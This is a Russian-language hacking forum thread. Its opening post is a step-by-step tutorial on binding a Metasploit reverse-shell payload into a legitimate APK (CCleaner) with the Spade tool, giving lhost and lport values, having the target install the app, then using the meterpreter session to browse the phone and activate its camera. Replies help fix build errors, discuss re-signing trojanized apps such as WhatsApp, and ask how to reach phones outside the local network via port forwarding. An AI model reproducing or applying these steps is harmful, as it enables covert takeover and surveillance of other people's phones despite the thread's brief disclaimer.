Взлом Android-устройства

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 17 окт 2016.

  1. Vander

    Vander Модератор
    Команда форума

    Регистрация:
    16 янв 2016
    Сообщения:
    315
    Симпатии:
    284
    Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.

    Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта www.apk4fun.com, попробуем, для начала, на ней.

    Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:

    upload_2016-10-17_20-20-41.png

    После успешного выполнения команды, вводим следующее:

    > ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)

    После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.

    > lhost > 192.168.0.103

    > lport > 4444

    upload_2016-10-17_20-21-32.png

    upload_2016-10-17_20-21-40.png

    Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.

    upload_2016-10-17_20-22-6.png

    Видим привилегии, которые нам доступны:

    upload_2016-10-17_20-22-32.png

    Готовый файл сохраняется в директории /root/spade

    upload_2016-10-17_20-22-51.png

    На запрос этой настройки отвечаем утвердительно:

    upload_2016-10-17_20-23-18.png

    Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:

    upload_2016-10-17_20-23-36.png

    Попробуем осмотреться в системе:

    upload_2016-10-17_20-23-55.png

    Все работает, теперь можно испытать работу, к примеру, камеры:

    upload_2016-10-17_20-24-23.png

    И эта команда срабатывает успешно:

    upload_2016-10-17_20-24-45.png

    На этом все, спасибо за внимание.

    Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
    Ссылка на оригинал - http://www.hackingarticles.in/hack-android-phone-using-spade-apk-backdoor/
     
    #1 Vander, 17 окт 2016
    Последнее редактирование: 24 окт 2016
    Leon, CthulhuCultist, vint1024 и 5 другим нравится это.
  2. gx6060

    gx6060 Python

    Регистрация:
    21 сен 2016
    Сообщения:
    37
    Симпатии:
    32
    за статью спасибо , познавательно. Глаза от стольких мониторов не разбегаются?):eek:
     
  3. Vander

    Vander Модератор
    Команда форума

    Регистрация:
    16 янв 2016
    Сообщения:
    315
    Симпатии:
    284
    :D Я один прикрываю)
     
  4. kuklofon

    kuklofon Parrot Security OS
    Команда форума

    Регистрация:
    28 фев 2016
    Сообщения:
    219
    Симпатии:
    116
    Наши с тобой темы часто перекликаются :) Чтоб не плодить одно и то же, я добавлю к твоему рассказу ещё одну софтину для этих целей. Написана на RUBY, скачать можно прям отсюда.
    Ну и небольшой видео обзор к ней.
    Работаем в команде )))

     

    Вложения:

    #4 kuklofon, 17 окт 2016
    Последнее редактирование: 17 окт 2016
    Vander нравится это.
  5. Vander

    Vander Модератор
    Команда форума

    Регистрация:
    16 янв 2016
    Сообщения:
    315
    Симпатии:
    284
    :) Ага, надо протестить на досуге
     
    kuklofon нравится это.
  6. kuklofon

    kuklofon Parrot Security OS
    Команда форума

    Регистрация:
    28 фев 2016
    Сообщения:
    219
    Симпатии:
    116
    слушай, но вот с ватсаппом такое не канает.. ну то есть он ставится, работает, но не даёт зарегать телефон, потому что подпись цифровая не родная...
     
  7. Vander

    Vander Модератор
    Команда форума

    Регистрация:
    16 янв 2016
    Сообщения:
    315
    Симпатии:
    284
    Ты про Ruby софтинку?
     
  8. kuklofon

    kuklofon Parrot Security OS
    Команда форума

    Регистрация:
    28 фев 2016
    Сообщения:
    219
    Симпатии:
    116
    я вообще про этот метод, там же в конце надо подписывать файл
     
  9. Vander

    Vander Модератор
    Команда форума

    Регистрация:
    16 янв 2016
    Сообщения:
    315
    Симпатии:
    284
    Понятно, а как его подписать? Я не пробовал с мессенджерами склеивать
     
  10. kuklofon

    kuklofon Parrot Security OS
    Команда форума

    Регистрация:
    28 фев 2016
    Сообщения:
    219
    Симпатии:
    116
    ну эта софтина на руби сама подписывает, а если руками - вот ссылка
     
    ghost нравится это.
  11. Vander

    Vander Модератор
    Команда форума

    Регистрация:
    16 янв 2016
    Сообщения:
    315
    Симпатии:
    284
    Спасибо
     
  12. Knife

    Knife Member

    Регистрация:
    16 окт 2016
    Сообщения:
    6
    Симпатии:
    4
    По работе с ruby и подписями вот более подробный видос
     
    ghost и Vander нравится это.
  13. Vander

    Vander Модератор
    Команда форума

    Регистрация:
    16 янв 2016
    Сообщения:
    315
    Симпатии:
    284
    Спасибо за инфо
     
  14. areez

    areez Member

    Регистрация:
    18 окт 2016
    Сообщения:
    12
    Симпатии:
    5
    Господа, проблема возникла
    на стадии пэйлода выдает такое и все тут
    [*] Injecting payload...
    mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit»: Нет такого файла или каталога
    mkdir: невозможно создать каталог «CCleaner_v1/smali/com/metasploit/stage»: Нет такого файла или каталога
    cp: указанная цель 'CCleaner_v1/smali/com/metasploit/stage/' не является каталогом
    [-] [Errno 2] No such file or directory: 'CCleaner_v1/AndroidManifest.xml'
    Пробовал разные апк, в пустую
     
  15. Vander

    Vander Модератор
    Команда форума

    Регистрация:
    16 янв 2016
    Сообщения:
    315
    Симпатии:
    284
    Привет, скриншот бы увидеть...
     
  16. areez

    areez Member

    Регистрация:
    18 окт 2016
    Сообщения:
    12
    Симпатии:
    5
    Проблему решил ту, возникла следующая - не создается файл -final, то есть в консоли пишется, мол создан ....-final.apk
    но в папке спейда пусто
     
  17. WebWare Team

    WebWare Team Администратор
    Команда форума

    Регистрация:
    30 дек 2015
    Сообщения:
    212
    Симпатии:
    101
    Опишите пожалуйста решение.
     
  18. MAdDog719

    MAdDog719 Well-Known Member

    Регистрация:
    16 авг 2016
    Сообщения:
    105
    Симпатии:
    19
    я так понимаю что если указать внешний IP и на роутере настроить правило переадресации порта на машину с кали (ну как это было рассказано в статье по Veali и Office) тогда смартфрну не нужуно будет находиться с мной в одной сети(подключенными к одному роутеру)? Сессия будет открыта как только как только запустишь приложение на смартфоне.
     
  19. areez

    areez Member

    Регистрация:
    18 окт 2016
    Сообщения:
    12
    Симпатии:
    5
    файл был дюже длинного названия, судя по всему, т.е. ccleaner_v1234... и тд , я попросту переименовал файл в ccleaner.apk и все

    ПРоблема с отсутсвием ссleaner-final.apk АКТУальна!
     
    #19 areez, 19 окт 2016
    Последнее редактирование: 19 окт 2016
    WebWare Team нравится это.
  20. Vander

    Vander Модератор
    Команда форума

    Регистрация:
    16 янв 2016
    Сообщения:
    315
    Симпатии:
    284
    По идее, должно работать. Но не проверял. Если проверите, отпишитесь потом, пожалуйста
     
Загрузка...

Поделиться этой страницей